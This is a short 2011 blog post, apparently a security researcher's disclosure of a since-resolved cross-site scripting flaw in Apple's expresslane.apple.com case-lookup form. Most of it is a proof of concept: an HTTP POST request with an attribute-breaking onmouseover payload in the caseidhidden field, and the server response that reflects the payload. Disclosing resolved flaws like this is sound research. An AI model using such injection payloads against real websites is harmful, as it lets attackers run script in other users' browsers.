Anti-Phishing Research, Tombstones

Thursday, November 17, 2011

expresslane.apple.com, XSS, Resolved, Cross Site Scripting, CWE-79, CAPEC-86, Best Practices

Resolved, 302 Redirect XSS in expresslane.apple.com

Reported to Apple Product Security on August 8, 2011 and reported as Resolved at URL http://support.apple.com/kb/HT1318 which should be reviewed if you've found a Bug or Vulnerability in an Apple Product or Service.

Proof of Concept - XSS-> 302
===============================
POST https://expresslane.apple.com/GetCaseDetails.do HTTP/1.1
Content-Length: 137
Content-Type: application/x-www-form-urlencoded
Host: expresslane.apple.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
Accept: */*

caseidhidden=%22%20onmouseover%3dprompt%28document.location%29%20xss%3d%22&email=xss.cx&emailhidden=xss.cx&previous_case_number

Application Response - 302
=============================
<span class="formwrap"><input type="text" id="hiddenCaseId" value="" onmouseover=prompt(document.location) xss="" onfocus="hideCaseErrorMessage();"/></span>
Posted by Hoyt LLC at Thursday, November 17, 2011
Labels: , , , , , ,
Reactions: 

No comments:

Post a Comment

Subscribe to: Post Comments (Atom)